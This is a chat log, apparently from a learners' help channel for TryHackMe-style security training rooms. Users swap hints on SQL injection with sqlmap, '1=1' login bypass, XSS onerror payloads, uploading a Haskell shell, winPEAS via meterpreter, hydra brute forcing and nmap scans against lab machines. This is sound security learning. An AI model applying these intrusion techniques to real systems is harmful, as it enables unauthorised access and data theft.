"You should have found some additional pages on different ports. What service does the site most likely use for this page?"
I said apache, then httpd
You mean you stuck on this question right
Yeah basically
I know there's a phpmyadmin login page
hmm
Well, i am doing some Fuzzing in some parameters on the last question in ZTH: Web 2 but no success. Any clues for that ?
Hmm, SQL injection..ugh I forgot how to do this, I remember trying it years ago
Payloadallthings and sqlmap all the way
"Try and return 1 on the page by entering certain characters into the form."
Which page though?
I use gobuster
On port 80?
Hmm strange
I also found a login.php using nikto but that wouldn't help now
I have a phpmyadmin login, wordpress login, and empty login.php
I say empty its just a user and pass box
@dusky osprey this may help you https://www.youtube.com/watch?v=TjRK3aVEC60
Welcome! This tutorial is a walkthrough on how to do blind SQL injection using Burp Suite for manual SQL injection and sqlmap for automatic SQL injection using a "real-life" example with hackerone, hacker101, CTF.
For more Ethical hacking and Info-Sec, and Information Gatheri...
Ah I get it I think
I mean sqli type
I put 1 and ' and it returned 0,
You should try basic auth bypass
Using burpsuite?
No need just try 1=1 thing
I tried 1=1# and it returned 0 too
I'm doing that now
Sqlmap spat out a .csv file w/
Target URL,Place,Parameter,Technique(s),Note(s)
http://************/login.php,POST,user,T,
Hi @white salmon Where are you stuck? Just DM.
Did sqlmap show injection then you can -dbs to see the tables
@lime needle I tried doing that but it didn't identify anything
Here's what I got so far.
A phpmyadmin login page, a wordpress login page, a {ip}/login.php page, and the exact wordpress site on ports 443 and 8080
for the {ip}/login.php page, it found a blind sql injection
And that's about it so far
Hi! how r u? I'm at the HaskHell room
Please,
What flag numbers all output lines? It has to be cat -nb filename
and I uploaded kind of a shell but I don't know if I'm using the right path to call it and I'm getting a 500 error
and having a 500 error is like, im not executing a haskell file?
@here I'm having some issues executing a python exploit on my machine keep getting errors anyone offer some fresh eyes?
Hey, I answered you in #room-help. I really recommend directly asking your question, then people know if they can help or not. They will help if they can, but they need to know the question first. @proven seal
and having a 500 error is like, im not executing a haskell file?
@grand pivot you shouldn’t need to visit anywhere. The webpage tells you that it’ll compile and execute upon submission
@proven seal you also don’t have the ability to @here and the fact that you’d try to notify everyone in this channel just to get your question answered is a bit selfish
@oblique cliff right but im getting the 500 error
that... is strange. I'm just executing a .hs extension file
Is the Haskell code you provided compile-able?
mmm lets see, i didnt check
Were you able to upload anything before?
Or is it everything you’ve tried to upload
i tried a .php file before
but when I'd get an error I just assumed from the text that I should upload a haskell file
Good assumption
yeah but you know, i wanted to try
Good thought. Ok so have you been able to get any Haskell file to run properly?
It does it for you. Why don’t you find some Haskell file online that you know will work if it’s actually doing what it claims?
Then once you have confirmation you can create your own?
i created my own
i get an error, i forgot one letter haha
damn
i tried just making a ls -l
great!! now it works, i did not spell the coMMand correctly
thank you
lol in the XSS Playground room there was a link in the credits to check, I'm trying to access it and I get this:
thought it was some joke about javascript and turned it off on my browser
also tried with curl
nevermind I think I know what is happening
anyone can give hint on XSS playground?
I have reached task5 and got stuck, in DOM based XSS q2 alert works with onerror but not with onhover
I tried multiple times, still the same issue: when performing the payload with onerror it accepts and shows me output without the flag, but onhover does not work
is it bug or I'm missing something ?
it's not a bug- you probably have the right payload
you might be making the javascript call wrong
there's something a bit off on that question with the onhover. read through my writeup on that section
I was totally about to give up 😂
I really don't see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day
thanks @4ngryb34r and @white salmon
I really don't see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day
@broken osprey users typically create files in their own homedir
the binaries? those are the only thing I see sticking out but don't know what they have to do with anything other than the tasks
Not the binaries
There's a file belonging to one of the users that's very much not in their home directory
That's suspicious
hoho! one small step
@stuck fractal thanks for those hints, I have now finally completed the room
Honestly it's a big step up in difficulty
hello i want to use winpeas in a windows meterpreter but it only says process created. I can't see winpeas execute, how can i fix this?
it only shows this meterpreter > execute -f winPEASany.exe
Process 3084 created.
And that's about it so far
@dusky osprey
Dump the DB and login to wp
Is it allowed to ask about the Spring room?
@sick sun yes
Hello, currently in Network Services room and stuck on Enumerating Telnet task #7, how am I to enumerate usernames on this box with Telnet?
It tells you what command to use
it does?
Try looking closely at the nmap scan @main creek
this is the result of my nmap scan
I'm either blind or just completely missing something
It should show up. Anyways you can get this username later too, if you continue on with exploiting telnet
Just try to connect to telnet and you will have the answer
and you don't see a potential username ?
Restart the box
ok, will try.
hello @everyone I need some help with 'Frequency Analysis'
Crypto Funhouse room, I tried to replace all the letters from the cipher with the English alphabet, did not get anything out, tried to match it as close as possible, but still the same issue
ahm sorry I don't know about the room, but isn't frequency analysis about counting the most used letters and then comparing them to the most frequent ones in the original alphabet?
yes exactly that's what frequency analysis about
yes I did that and it did not give me anything
I did the permutation between the most frequent letters in the cipher with the most in english alphabet
I'm trying to solve Simple CTF room, can someone help me with that
Sure, ask away
I did nmap scan for vulns, can't find anything useful..
Trying to bruteforce with hydra.. as the hint says to use best110.txt
Try dirbusting ?
Yeah, dirbuster is currently running
@quiet hound scan with the -p-
@quiet hound Wait for it 🙂
nmap will scan for the first 1000, and there might be an interesting service running on a random high port
@final mortar have you (by chance) solved the 'cypto fun house' room?
@chrome heron I totally forgot about that.. Thank you so much for the help. I'll try scanning all the ports and further update
Let me check real quick
@quiet hound Yeah you will need the -p- flag, just not at this stage
That's a no, sorry
I don't even know where to start in "Git Happens" lol. Is it appropriate to ask for it(s?) hints yet?
